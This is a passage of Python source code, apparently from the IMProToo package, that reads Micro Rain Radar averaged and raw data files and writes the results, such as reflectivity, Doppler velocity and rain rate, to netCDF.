nc_qual.units = "bin"
nc_qual[:] = np.array(qualArray, dtype="i4")
#if not pyNc: nc_qual._FillValue =int(self.missingNumber)
if varsToSave == 'all' or "TF" in varsToSave:
nc_TF = cdfFile.createVariable('TF', 'f', ncShape2D, **fillVDict)
nc_TF.description = "Transfer Function (see Metek's documentation)"
nc_TF.units = "-"
nc_TF[:] = np.array(self.TF.filled(self.missingNumber), dtype="f4")
#if not pyNc: nc_TF._FillValue =float(self.missingNumber)
if (varsToSave == 'all' and saveAlsoNonDealiased) or "Ze_noDA" in varsToSave:
nc_ze_noDA = cdfFile.createVariable(
'Ze_noDA', 'f', ncShape2D, **fillVDict)
nc_ze_noDA.description = "reflectivity of the most significant peak, not dealiased"
nc_ze_noDA.units = "dBz"
nc_ze_noDA[:] = np.array(self.Ze_noDA, dtype="f4")
#if not pyNc: nc_ze_noDA._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "Ze" in varsToSave:
nc_ze = cdfFile.createVariable('Ze', 'f', ncShape2D, **fillVDict)
nc_ze.description = "reflectivity of the most significant peak"
nc_ze.units = "dBz"
nc_ze[:] = np.array(self.Ze, dtype="f4")
#if not pyNc: nc_ze._FillValue =float(self.missingNumber)
if (varsToSave == 'all' and saveAlsoNonDealiased) or "specWidth_noDA" in varsToSave:
nc_specWidth_noDA = cdfFile.createVariable(
'spectralWidth_noDA', 'f', ncShape2D, **fillVDict)
nc_specWidth_noDA.description = "spectral width of the most significant peak, not dealiased"
nc_specWidth_noDA.units = "m s^-1"
nc_specWidth_noDA[:] = np.array(self.specWidth_noDA, dtype="f4")
#if not pyNc: nc_specWidth_noDA._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "specWidth" in varsToSave:
nc_specWidth = cdfFile.createVariable(
'spectralWidth', 'f', ncShape2D, **fillVDict)
nc_specWidth.description = "spectral width of the most significant peak"
nc_specWidth.units = "m s^-1"
nc_specWidth[:] = np.array(self.specWidth, dtype="f4")
#if not pyNc: nc_specWidth._FillValue =float(self.missingNumber)
if (varsToSave == 'all' and saveAlsoNonDealiased) or "skewness_noDA" in varsToSave:
nc_skewness_noDA = cdfFile.createVariable(
'skewness_noDA', 'f', ncShape2D, **fillVDict)
nc_skewness_noDA.description = "Skewness of the most significant peak, not dealiased"
nc_skewness_noDA.units = "-"
nc_skewness_noDA[:] = np.array(self.skewness_noDA, dtype="f4")
#if not pyNc: nc_skewness_noDA._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "skewness" in varsToSave:
nc_skewness = cdfFile.createVariable(
'skewness', 'f', ncShape2D, **fillVDict)
nc_skewness.description = "Skewness of the most significant peak"
nc_skewness.units = "-"
nc_skewness[:] = np.array(self.skewness, dtype="f4")
#if not pyNc: nc_skewness._FillValue =float(self.missingNumber)
if (varsToSave == 'all' and saveAlsoNonDealiased) or "kurtosis_noDA" in varsToSave:
nc_kurtosis_noDA = cdfFile.createVariable(
'kurtosis_noDA', 'f', ncShape2D, **fillVDict)
nc_kurtosis_noDA.description = "kurtosis of the most significant peak, not dealiased"
nc_kurtosis_noDA.units = "-"
nc_kurtosis_noDA[:] = np.array(self.kurtosis_noDA, dtype="f4")
#if not pyNc: nc_kurtosis_noDA._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "kurtosis" in varsToSave:
nc_kurtosis = cdfFile.createVariable(
'kurtosis', 'f', ncShape2D, **fillVDict)
nc_kurtosis.description = "kurtosis of the most significant peak"
nc_kurtosis.units = "-"
nc_kurtosis[:] = np.array(self.kurtosis, dtype="f4")
#if not pyNc: nc_kurtosis._FillValue =float(self.missingNumber)
if (varsToSave == 'all' and saveAlsoNonDealiased) or "peakVelLeftBorder_noDA" in varsToSave:
nc_peakVelLeftBorder_noDA = cdfFile.createVariable(
'peakVelLeftBorder_noDA', 'f', ncShape2D, **fillVDict)
nc_peakVelLeftBorder_noDA.description = "Doppler velocity of the left border of the peak, not dealiased"
nc_peakVelLeftBorder_noDA.units = "m s^-1"
nc_peakVelLeftBorder_noDA[:] = np.array(
self.peakVelLeftBorder_noDA, dtype="f4")
#if not pyNc: nc_peakVelLeftBorder_noDA._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "peakVelLeftBorder" in varsToSave:
nc_peakVelLeftBorder = cdfFile.createVariable(
'peakVelLeftBorder', 'f', ncShape2D, **fillVDict)
nc_peakVelLeftBorder.description = "Doppler velocity of the left border of the peak"
nc_peakVelLeftBorder.units = "m s^-1"
nc_peakVelLeftBorder[:] = np.array(
self.peakVelLeftBorder, dtype="f4")
#if not pyNc: nc_peakVelLeftBorder._FillValue =float(self.missingNumber)
if (varsToSave == 'all' and saveAlsoNonDealiased) or "peakVelRightBorder_noDA" in varsToSave:
nc_peakVelRightBorder_noDA = cdfFile.createVariable(
'peakVelRightBorder_noDA', 'f', ncShape2D, **fillVDict)
nc_peakVelRightBorder_noDA.description = "Doppler velocity of the right border of the peak, not dealiased"
nc_peakVelRightBorder_noDA.units = "m s^-1"
nc_peakVelRightBorder_noDA[:] = np.array(
self.peakVelRightBorder_noDA, dtype="f4")
#if not pyNc: nc_peakVelRightBorder_noDA._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "peakVelRightBorder" in varsToSave:
nc_peakVelRightBorder = cdfFile.createVariable(
'peakVelRightBorder', 'f', ncShape2D, **fillVDict)
nc_peakVelRightBorder.description = "Doppler velocity of the right border of the peak"
nc_peakVelRightBorder.units = "m s^-1"
nc_peakVelRightBorder[:] = np.array(
self.peakVelRightBorder, dtype="f4")
#if not pyNc: nc_peakVelRightBorder._FillValue =float(self.missingNumber)
if (varsToSave == 'all' and saveAlsoNonDealiased) or "leftSlope_noDA" in varsToSave:
nc_leftSlope_noDA = cdfFile.createVariable(
'leftSlope_noDA', 'f', ncShape2D, **fillVDict)
nc_leftSlope_noDA.description = "Slope at the left side of the peak, not dealiased"
nc_leftSlope_noDA.units = "dB/(m s^-1)"
nc_leftSlope_noDA[:] = np.array(self.leftSlope_noDA, dtype="f4")
#if not pyNc: nc_leftSlope_noDA._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "leftSlope" in varsToSave:
nc_leftSlope = cdfFile.createVariable(
'leftSlope', 'f', ncShape2D, **fillVDict)
nc_leftSlope.description = "Slope at the left side of the peak"
nc_leftSlope.units = "dB/(m s^-1)"
nc_leftSlope[:] = np.array(self.leftSlope, dtype="f4")
#if not pyNc: nc_leftSlope._FillValue =float(self.missingNumber)
if (varsToSave == 'all' and saveAlsoNonDealiased) or "rightSlope_noDA" in varsToSave:
nc_rightSlope_noDA = cdfFile.createVariable(
'rightSlope_noDA', 'f', ncShape2D, **fillVDict)
nc_rightSlope_noDA.description = "Slope at the right side of the peak, not dealiased"
nc_rightSlope_noDA.units = "dB/(m s^-1)"
nc_rightSlope_noDA[:] = np.array(self.rightSlope_noDA, dtype="f4")
#if not pyNc: nc_rightSlope_noDA._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "rightSlope" in varsToSave:
nc_rightSlope = cdfFile.createVariable(
'rightSlope', 'f', ncShape2D, **fillVDict)
nc_rightSlope.description = "Slope at the right side of the peak"
nc_rightSlope.units = "dB/(m s^-1)"
nc_rightSlope[:] = np.array(self.rightSlope, dtype="f4")
#if not pyNc: nc_rightSlope._FillValue =float(self.missingNumber)
if (varsToSave == 'all' and saveAlsoNonDealiased) or "W_noDA" in varsToSave:
nc_w_noDA = cdfFile.createVariable(
'W_noDA', 'f', ncShape2D, **fillVDict)
nc_w_noDA.description = "Mean Doppler Velocity of the most significant peak, not dealiased"
nc_w_noDA.units = "m s^-1"
nc_w_noDA[:] = np.array(self.W_noDA, dtype="f4")
#if not pyNc: nc_w_noDA._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "W" in varsToSave:
nc_w = cdfFile.createVariable('W', 'f', ncShape2D, **fillVDict)
nc_w.description = "Mean Doppler Velocity of the most significant peak"
nc_w.units = "m s^-1"
nc_w[:] = np.array(self.W, dtype="f4")
#if not pyNc: nc_w._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "etaNoiseAve" in varsToSave:
nc_noiseAve = cdfFile.createVariable(
'etaNoiseAve', 'f', ncShape2D, **fillVDict)
nc_noiseAve.description = "mean noise of one Doppler Spectrum in the same units as eta, never dealiased"
nc_noiseAve.units = "mm^6 m^-3"
nc_noiseAve[:] = np.array(self.etaNoiseAve, dtype="f4")
#if not pyNc: nc_noiseAve._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "etaNoiseStd" in varsToSave:
nc_noiseStd = cdfFile.createVariable(
'etaNoiseStd', 'f', ncShape2D, **fillVDict)
nc_noiseStd.description = "std of noise of one Doppler Spectrum in the same units as eta, never dealiased"
nc_noiseStd.units = "mm^6 m^-3"
nc_noiseStd[:] = np.array(self.etaNoiseStd, dtype="f4")
#if not pyNc: nc_noiseStd._FillValue =float(self.missingNumber)
if varsToSave == 'all' or "SNR" in varsToSave:
nc_SNR = cdfFile.createVariable('SNR', 'f', ncShape2D, **fillVDict)
nc_SNR.description = "signal to noise ratio of the most significant peak, never dealiased!"
nc_SNR.units = "dB"
nc_SNR[:] = np.array(self.SNR, dtype="f4")
#if not pyNc: nc_SNR._FillValue =float(self.missingNumber)
cdfFile.close()
return
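    # Commented usage sketch (assuming `processedData` is an instance of this class on
    # which the raw data has already been processed):
    #
    #   processedData.writeNetCDF('/tmp/mrr_improtoo.nc', varsToSave='all',
    #                             ncForm='NETCDF3_CLASSIC')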
class mrrProcessedData:
'''
Class to read MRR average or instantaneous data
includes function to save data to netcdf
'''
missingNumber = -9999
def __init__(self, fname, debugLimit=0, maskData=True, verbosity=2, ncForm="NETCDF3_CLASSIC"):
"""
reads MRR Average or Instantaneous data. The data is not converted, no magic! The input files can be .gz compressed. Invalid or missing data is marked as nan
@parameter fname (str or list): list of files or Filename, wildcards allowed, or
a single netCDF filename if reading from a file previously
created by mrrProcessedData.writeNetCDF()
@parameter debugLimit (int): stop after debugLimit timestamps
@parameter maskData (bool): mask nan's in arrays
@parameter verbosity (int): 0: silent exept warnings/errors, 2:verbose
@parameter ncForm (string): set netCDF format
No return, but provides MRR dataset variables
"""
# If this is a single filename input, and it is a netCDF
# (extension is nc or cdf), then read it directly and return.
if type(fname) is str:
if os.path.splitext(fname)[1] in ('.nc', '.cdf'):
nc, pyNc = _get_netCDF_module(ncForm=ncForm)
if pyNc:
cdfFile = nc.Dataset(fname, "r", format=ncForm)
else:
cdfFile = nc.NetCDFFile(fname, "r")
self.header = cdfFile.getncattr('mrrHeader')
self.mrrTimestamps = cdfFile.variables['time'][:]
self.mrrH = cdfFile.variables['MRR_H'][:]
self.mrrTF = cdfFile.variables['MRR_TF'][:]
self.mrrF = cdfFile.variables['MRR_F'][:]
self.mrrD = cdfFile.variables['MRR_D'][:]
self.mrrN = cdfFile.variables['MRR_N'][:]
self.mrrK = cdfFile.variables['MRR_K'][:]
self.mrrCapitalZ = cdfFile.variables['MRR_Capital_Z'][:]
self.mrrSmallz = cdfFile.variables['MRR_Small_z'][:]
self.mrrPIA = cdfFile.variables['MRR_PIA'][:]
self.mrrRR = cdfFile.variables['MRR_RR'][:]
self.mrrLWC = cdfFile.variables['MRR_LWC'][:]
self.mrrW = cdfFile.variables['MRR_W'][:]
cdfFile.close()
self.shape2D = np.shape(self.mrrH)
self.shape3D = np.shape(self.mrrF)
return
# some helper functions!
def splitMrrAveData(string, debugTime, floatInt):
            '''
            splits one line of mrr data into a list
            @parameter string (str): string of MRR data
            @parameter debugTime (int): time for debug output
            @parameter floatInt (type): convert float or integer
            @return array with mrr data
            '''
listOfData = list()
listOfData_append = listOfData.append
i_start = 3
i_offset = 7
try:
for k in np.arange(i_start, i_offset*31, i_offset):
listOfData_append(mrrDataEsc(
string[k:k+i_offset], floatInt))
except:
# try to fix MRR bug
print("repairing data at " + str(unix2date(debugTime)))
string = string.replace("10000.0", "10000.")
string = string.replace("1000.00", "1000.0")
string = string.replace("100.000", "100.00")
string = string.replace("10.0000", "10.000")
string = string.replace("1.00000", "1.0000")
listOfData = list()
listOfData_append = listOfData.append
for k in np.arange(i_start, i_offset*31, i_offset):
try:
listOfData_append(mrrDataEsc(
string[k:k+i_offset], floatInt))
except:
print("######### Warning, Corrupt data at " + str(unix2date(debugTime)
) + ", position "+str(k)+": " + string+" #########")
listOfData_append(np.nan)
return np.array(listOfData)
def mrrDataEsc(string, floatInt):
"""
set invalid data to nan!
@parameter string (str): string from mrr data
@parameter floatInt (function): int or float function
@return - float or int number
"""
if (string == " "*7) or (len(string) != 7):
return np.nan
else:
return floatInt(string)
if type(fname) == list:
files = fname
else:
files = glob.glob(fname)
files.sort()
foundAtLeastOneFile = False
# go through all files
for f, file in enumerate(files):
if verbosity > 1:
print("%s of %s:" % (f+1, len(files)), file)
# open file, gzip or ascii
try:
if file[-3:] == ".gz":
try:
allData = gzip.open(file, 'rt')
except:
print("could not open:", file)
raise IOError("could not open:" + file)
else:
try:
# without errors='ignore', post-processing script crashes
# when loading MRR raw file with some missing/corrupt data
# using codecs.open(... encoding='UTF-8' ...) as this seems to be
# the only method that works in python 2 and 3.
allData = codecs.open(file, 'r', encoding='UTF-8', errors='ignore')
except:
print("could not open:", file)
raise IOError("could not open:" + file)
if len(allData.read(10)) == 0:
print(file, "empty!")
allData.close()
raise IOError("File empty")
else:
allData.seek(0)
i = 0
except IOError:
print("skipping...", file)
continue
foundAtLeastOneFile = True
# go through file and make a dictionary with timestamp as key and all corresponding lines of data as values
dataMRR = {}
prevDate = 0
tmpList = list()
for line in allData:
if line[0:3] == "MRR":
if i != 0:
dataMRR[prevDate] = tmpList
tmpList = []
asciiDate = line[4:20]
# We must have UTC!
if (re.search("UTC", line) == None):
sys.exit("Warning, line must start with UTC!")
date = datetime.datetime(year=2000+int(asciiDate[0:2]), month=int(asciiDate[2:4]), day=int(
asciiDate[4:6]), hour=int(asciiDate[6:8]), minute=int(asciiDate[8:10]), second=int(asciiDate[10:12]))
date = int(date2unix(date))
tmpList.append(line)
prevDate = date
else:
tmpList.append(line)
i += 1
dataMRR[prevDate] = tmpList
allData.close()
try:
del dataMRR[0]
print("Warning: some lines without timestamp")
except:
pass
if debugLimit == 0:
debugLimit = len(list(dataMRR.keys()))
# create arrays for data
aveTimestamps = np.array(np.sort(list(dataMRR.keys()))[
0:debugLimit], dtype=int)
aveH = np.ones((debugLimit, 31), dtype=float)*np.nan
aveTF = np.ones((debugLimit, 31), dtype=float)*np.nan
aveF = np.ones((debugLimit, 31, 64), dtype=float)*np.nan
aveN = np.ones((debugLimit, 31, 64), dtype=float)*np.nan
aveD = np.ones((debugLimit, 31, 64), dtype=float)*np.nan
aveK = np.ones((debugLimit, 31), dtype=float)*np.nan
aveCapitalZ = np.ones((debugLimit, 31), dtype=float)*np.nan
aveSmallz = np.ones((debugLimit, 31), dtype=float)*np.nan
avePIA = np.ones((debugLimit, 31), dtype=float)*np.nan
aveRR = np.ones((debugLimit, 31), dtype=float)*np.nan
aveLWC = np.ones((debugLimit, 31), dtype=float)*np.nan
aveW = np.ones((debugLimit, 31), dtype=float)*np.nan
# go through timestamps and fill up arrays
for t, timestamp in enumerate(aveTimestamps[0:debugLimit]):
# print unix2date(timestamp)
dataSet = dataMRR[timestamp]
for dataLine in dataSet:
if dataLine[0:3] == "MRR":
# just one is stored, thus no array
self.header = dataLine[21:-2]
continue # print timestamp
elif dataLine[0:3] == "H ":
aveH[t, :] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif dataLine[0:3] == "TF ":
aveTF[t, :] = splitMrrAveData(
dataLine, timestamp, float)
continue # print "TF"
elif dataLine[0:1] == "F":
try:
specBin = int(dataLine[1:3])
except:
print("######### Warning, Corrupt data header at " +
str(unix2date(timestamp)) + ", " + dataLine+" #########")
continue
aveF[t, :, specBin] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif dataLine[0:1] == "D":
try:
specBin = int(dataLine[1:3])
except:
print("######### Warning, Corrupt data header at " +
str(unix2date(timestamp)) + ", " + dataLine+" #########")
continue
aveD[t, :, specBin] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif dataLine[0:1] == "N":
try:
specBin = int(dataLine[1:3])
except:
print("######### Warning, Corrupt data header at " +
str(unix2date(timestamp)) + ", " + dataLine+" #########")
continue
aveN[t, :, specBin] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif dataLine[0:3] == "K ":
aveK[t, :] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif dataLine[0:3] == "PIA":
avePIA[t, :] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif dataLine[0:3] == "Z ":
aveCapitalZ[t, :] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif dataLine[0:3] == "z ":
aveSmallz[t, :] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif dataLine[0:3] == "RR ":
aveRR[t, :] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif dataLine[0:3] == "LWC":
aveLWC[t, :] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif dataLine[0:3] == "W ":
aveW[t, :] = splitMrrAveData(
dataLine, timestamp, float)
continue
elif len(dataLine) == 2:
continue
else:
print("? Line not recognized:", str(
unix2date(timestamp)), dataLine, len(dataLine))
# join arrays of different files
try:
self.mrrTimestamps = np.concatenate(
(self.mrrTimestamps, aveTimestamps), axis=0)
self.mrrH = np.concatenate((self.mrrH, aveH), axis=0)
self.mrrTF = np.concatenate((self.mrrTF, aveTF), axis=0)
self.mrrF = np.concatenate((self.mrrF, aveF), axis=0)
self.mrrN = np.concatenate((self.mrrN, aveN), axis=0)
self.mrrD = np.concatenate((self.mrrD, aveD), axis=0)
self.mrrK = np.concatenate((self.mrrK, aveK), axis=0)
self.mrrPIA = np.concatenate((self.mrrPIA, avePIA), axis=0)
self.mrrCapitalZ = np.concatenate(
(self.mrrCapitalZ, aveCapitalZ), axis=0)
self.mrrSmallz = np.concatenate(
(self.mrrSmallz, aveSmallz), axis=0)
self.mrrRR = np.concatenate((self.mrrRR, aveRR), axis=0)
self.mrrLWC = np.concatenate((self.mrrLWC, aveLWC), axis=0)
self.mrrW = np.concatenate((self.mrrW, aveW), axis=0)
except AttributeError:
self.mrrTimestamps = aveTimestamps
self.mrrH = aveH
self.mrrTF = aveTF
self.mrrF = aveF
self.mrrN = aveN
self.mrrD = aveD
self.mrrK = aveK
self.mrrPIA = avePIA
self.mrrCapitalZ = aveCapitalZ
self.mrrSmallz = aveSmallz
self.mrrRR = aveRR
self.mrrLWC = aveLWC
self.mrrW = aveW
if not foundAtLeastOneFile:
print("NO DATA")
raise UnboundLocalError
try:
self.header
except:
print("did not find any MRR data in file!")
raise IOError("did not find any MRR data in file!")
del aveTimestamps, aveH, aveTF, aveF, aveN, aveD, aveK, avePIA, aveCapitalZ, aveSmallz, aveRR, aveLWC, aveW
if maskData:
self.mrrTimestamps = np.ma.masked_array(
self.mrrTimestamps, np.isnan(self.mrrTimestamps))
self.mrrH = np.ma.masked_array(self.mrrH, np.isnan(self.mrrH))
self.mrrTF = np.ma.masked_array(self.mrrTF, np.isnan(self.mrrTF))
self.mrrF = np.ma.masked_array(self.mrrF, np.isnan(self.mrrF))
self.mrrN = np.ma.masked_array(self.mrrN, np.isnan(self.mrrN))
self.mrrD = np.ma.masked_array(self.mrrD, np.isnan(self.mrrD))
self.mrrK = np.ma.masked_array(self.mrrK, np.isnan(self.mrrK))
self.mrrPIA = np.ma.masked_array(
self.mrrPIA, np.isnan(self.mrrPIA))
self.mrrCapitalZ = np.ma.masked_array(
self.mrrCapitalZ, np.isnan(self.mrrCapitalZ))
self.mrrSmallz = np.ma.masked_array(
self.mrrSmallz, np.isnan(self.mrrSmallz))
self.mrrRR = np.ma.masked_array(self.mrrRR, np.isnan(self.mrrRR))
self.mrrLWC = np.ma.masked_array(
self.mrrLWC, np.isnan(self.mrrLWC))
self.mrrW = np.ma.masked_array(self.mrrW, np.isnan(self.mrrW))
self.shape2D = np.shape(self.mrrH)
self.shape3D = np.shape(self.mrrF)
if verbosity > 0:
print("done reading")
# end def __init__
def writeNetCDF(self, fileOut, author="IMProToo", location="", institution="", ncForm="NETCDF3_CLASSIC"):
'''
writes MRR Average or Instantaneous Data into Netcdf file
@parameter fileOut (str): netCDF file name
@parameter author (str): Author for netCDF meta data (default:IMProToo)
@parameter location (str): Location of instrument for NetCDF Metadata (default: "")
@parameter institution (str): Institution to whom the instrument belongs (default: "")
@parameter ncForm (str): netCDF Format, possible values are NETCDF3_CLASSIC, NETCDF3_64BIT, NETCDF4_CLASSIC, and NETCDF4 for the python-netcdf4 package; NETCDF3 takes the "old" Scientific.IO.NetCDF module, which is a bit more convenient to install, or python-netcdf3 as a fall-back option
'''
nc, pyNc = _get_netCDF_module(ncForm=ncForm)
if pyNc:
cdfFile = nc.Dataset(fileOut, "w", format=ncForm)
else:
cdfFile = nc.NetCDFFile(fileOut, "w")
fillVDict = dict()
# little cheat to avoid hundreds of if, else...
if pyNc:
fillVDict["fill_value"] = self.missingNumber
print("writing %s ..." % (fileOut))
# Attributes
cdfFile.history = 'Created with IMProToo v' + __version__
cdfFile.author = 'Max Maahn'
cdfFile.processing_date = datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S UTC")
cdfFile.reference = 'Maahn, M. and Kollias, P., 2012: Improved Micro Rain Radar snow measurements using Doppler spectra post-processing, Atmos. Meas. Tech., 5, 2661-2673, doi:10.5194/amt-5-2661-2012. '
cdfFile.title = 'Micro rain radar averaged data (Metek standard output) converted to netcdf'
cdfFile.comment = 'This data is only valid in case of liquid precipitation. Note that this data has been processed regardless of precipitation type and additional external information about precipitation type is needed for correct interpretation of the measurements.'
cdfFile.institution = institution
cdfFile.contact_person = author
cdfFile.source = 'MRR-2'
cdfFile.location = location
cdfFile.mrrHeader = self.header
# Dimensions
cdfFile.createDimension('MRR rangegate', 31)
cdfFile.createDimension('time', None) # allows Multifile read
cdfFile.createDimension('MRR spectralclass', 64)
nc_times = cdfFile.createVariable('time', 'i', ('time',), **fillVDict)
nc_ranges = cdfFile.createVariable(
'MRR rangegate', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_classes = cdfFile.createVariable(
'MRR spectralclass', 'i', ('MRR spectralclass',))
nc_times.units = 'seconds since 1970-01-01 00:00:00'
nc_ranges.units = 'm'
nc_classes.units = 'none'
# Create Variables
nc_h = cdfFile.createVariable(
'MRR_H', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_h.units = 'm'
nc_tf = cdfFile.createVariable(
'MRR_TF', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_tf.units = 'none'
nc_f = cdfFile.createVariable(
'MRR_F', 'f', ('time', 'MRR rangegate', 'MRR spectralclass',), **fillVDict)
nc_f.units = 'dB'
nc_d = cdfFile.createVariable(
'MRR_D', 'f', ('time', 'MRR rangegate', 'MRR spectralclass',), **fillVDict)
nc_d.units = 'mm'
nc_n = cdfFile.createVariable(
'MRR_N', 'f', ('time', 'MRR rangegate', 'MRR spectralclass',), **fillVDict)
nc_n.units = 'm^-3 mm^-1'
nc_k = cdfFile.createVariable(
'MRR_K', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_k.units = 'dB'
nc_capitalZ = cdfFile.createVariable(
'MRR_Capital_Z', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_capitalZ.units = 'dBz'
nc_smallz = cdfFile.createVariable(
'MRR_Small_z', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_smallz.units = 'dBz'
nc_pia = cdfFile.createVariable(
'MRR_PIA', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_pia.units = 'dB'
nc_rr = cdfFile.createVariable(
'MRR_RR', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_rr.units = 'mm/h'
nc_lwc = cdfFile.createVariable(
'MRR_LWC', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_lwc.units = 'g/m^3'
nc_w = cdfFile.createVariable(
'MRR_W', 'f', ('time', 'MRR rangegate',), **fillVDict)
nc_w.units = 'm s^-1'
# fill dimensions
nc_classes[:] = np.arange(0, 64, 1, dtype="i4")
nc_times[:] = np.array(self.mrrTimestamps, dtype="i4")
nc_ranges[:] = np.array(self.mrrH, dtype="f4")
# fill data
nc_h[:] = np.array(self.mrrH, dtype="f4")
nc_tf[:] = np.array(self.mrrTF, dtype="f4")
nc_f[:] = np.array(self.mrrF, dtype="f4")
nc_d[:] = np.array(self.mrrD, dtype="f4")
nc_n[:] = np.array(self.mrrN, dtype="f4")
nc_k[:] = np.array(self.mrrK, dtype="f4")
nc_capitalZ[:] = np.array(self.mrrCapitalZ, dtype="f4")
nc_smallz[:] = np.array(self.mrrSmallz, dtype="f4")
nc_pia[:] = np.array(self.mrrPIA, dtype="f4")
nc_rr[:] = np.array(self.mrrRR, dtype="f4")
nc_lwc[:] = np.array(self.mrrLWC, dtype="f4")
nc_w[:] = np.array(self.mrrW, dtype="f4")
# commented because of Ubuntu bug: https://bugs.launchpad.net/ubuntu/+source/python-scientific/+bug/1005571
# if not pyNc:
##import pdb;pdb.set_trace()
#nc_ranges._FillValue =float(self.missingNumber)
#nc_tf._FillValue =float(self.missingNumber)
#nc_f._FillValue =float(self.missingNumber)
#nc_d._FillValue =float(self.missingNumber)
#nc_n._FillValue =float(self.missingNumber)
#nc_k._FillValue =float(self.missingNumber)
#nc_capitalZ._FillValue =float(self.missingNumber)
#nc_smallz._FillValue =float(self.missingNumber)
#nc_pia._FillValue =float(self.missingNumber)
#nc_rr._FillValue =float(self.missingNumber)
#nc_lwc._FillValue =float(self.missingNumber)
#nc_w._FillValue =float(self.missingNumber)
cdfFile.close()
print("done")
# end def writeNetCDF
# end class MrrData
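# A minimal usage sketch for the averaged-data reader above (file names are
# hypothetical, and the class name mrrProcessedData is assumed from the
# IMProToo API rather than shown in this excerpt):
#
#   processed = mrrProcessedData("mrr_ave_0101.gz")  # wildcards also work
#   processed.writeNetCDF("mrr_ave_0101.nc", location="some site")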
class mrrRawData:
'''
Class to read MRR raw data
includes function to save data to netcdf
'''
missingNumber = -9999
def __init__(self, fname, debugStart=0, debugLimit=0, maskData=True, ncForm="NETCDF3_CLASSIC"):
"""
reads MRR raw data. The data is not converted, no magic! The input files can be .gz compressed.
A single netCDF file can be input, that was previously created from mrrRawData.writeNetCDF()
Invalid or Missing data is marked as nan and masked
Since MRR raw data can contain all the data transferred on the serial bus, a lot of warnings can be raised. Usually these can be ignored.
@parameter fname (str or list): list of files or Filename, wildcards allowed!
a single netCDF filename if reading from a file previously
created by mrrRawData.writeNetCDF()
@parameter debugStart (int): start after debugStart timestamps
@parameter debugLimit (int): stop after debugLimit timestamps
@parameter ncForm (string): set netCDF format
provides:
mrrRawTime (numpy int64): timestamps in seconds since 01-01-1970 (time)
mrrRawHeight (numpy float64): height levels (time*height)
mrrRawTF (numpy float64): Transfer function (time*height)
mrrRawSpectrum (numpy float64): spectral reflectivities of MRR raw data (time*height*velocity)
"""
# only provided in newer Firmware, has to be guessed for older ones
self.defaultSpecPer10Sec = 58
self.timezone = None
# If this is a single filename input, and it is a netCDF
# (extension is nc or cdf), then read it directly and return.
if type(fname) is str:
if os.path.splitext(fname)[1] in ('.nc', '.cdf'):
nc, pyNc = _get_netCDF_module(ncForm=ncForm)
if pyNc:
cdfFile = nc.Dataset(fname, "r", format=ncForm)
else:
cdfFile = nc.NetCDFFile(fname, "r")
self.header = cdfFile.getncattr('mrrHeader')
self.mrrRawCC = cdfFile.getncattr('mrrCalibrationConstant')
self.mrrRawHeight = cdfFile.variables['MRR rangegate'][:]
self.mrrRawTime = cdfFile.variables['MRR time'][:]
self.mrrRawTF = cdfFile.variables['MRR_TF'][:]
self.mrrRawSpectrum = cdfFile.variables['MRR_Spectra'][:]
self.mrrRawNoSpec = cdfFile.variables['MRR_NoSpectra'][:]
try:
self.timezone = str(cdfFile.variables['MRR time'].timezone)
except AttributeError:
# this can occur when loading a file created with an older
# version of IMProToo, before the timezone update.
warnings.warn("timezone attribute missing, assuming UTC")
self.timezone = "UTC"
cdfFile.close()
self.shape2D = np.shape(self.mrrRawHeight)
self.shape3D = np.shape(self.mrrRawSpectrum)
return
# some helper functions
def rawEsc(string, floatInt):
"""
set invalid data to nan!
@parameter string (str): string from mrr data
@parameter floatInt (function): int or float function
@return - float or int number
"""
if (string == " "*9) or (len(string) != 9):
return np.nan
else:
return floatInt(string)
def splitMrrRawData(string, debugTime, floatInt, startI):
'''
splits one line of mrr raw data into list
@parameter string (str) string of MRR data
@parameter debugTime (int) time for debug output
@parameter floatInt (type) convert float or integer
@parameter startI (int) first data index, old file format 6, new 3
@return array with mrr data
'''
instData = list()
instData_append = instData.append
for k in np.arange(startI, 9*32, 9):
try:
instData_append(rawEsc(string[k:k+9], floatInt))
except:
print("######### Warning, Corrupt data at " + str(unix2date(debugTime)) +
", " + str(timestamp) + ", position "+str(k)+": " + string+" #########")
instData_append(np.nan)
return np.array(instData)
if type(fname) == list:
files = fname
else:
files = glob.glob(fname)
files.sort()
foundAtLeastOneFile = False
# go through all files
for f, file in enumerate(files):
print("%s of %s:" % (f+1, len(files)), file)
# open file gz or ascii
try:
if file[-3:] == ".gz":
try:
allData = gzip.open(file, 'rt')
except:
print("could not open:", file)
raise IOError("could not open:" + file)
else:
try:
# without errors='ignore', post-processing script crashes
# when loading MRR raw file with some missing/corrupt data
# using codecs.open(... encoding='UTF-8' ...) as this seems to be
# the only method that works in python 2 and 3.
allData = codecs.open(file, 'r', encoding='UTF-8', errors='ignore')
except:
print("could not open:", file)
raise IOError("could not open:" + file)
if len(allData.read(10)) == 0:
print(file, "empty!")
allData.close()
raise IOError("File empty")
else:
allData.seek(0)
i = 0
except IOError:
print("skipping...")
continue
foundAtLeastOneFile = True
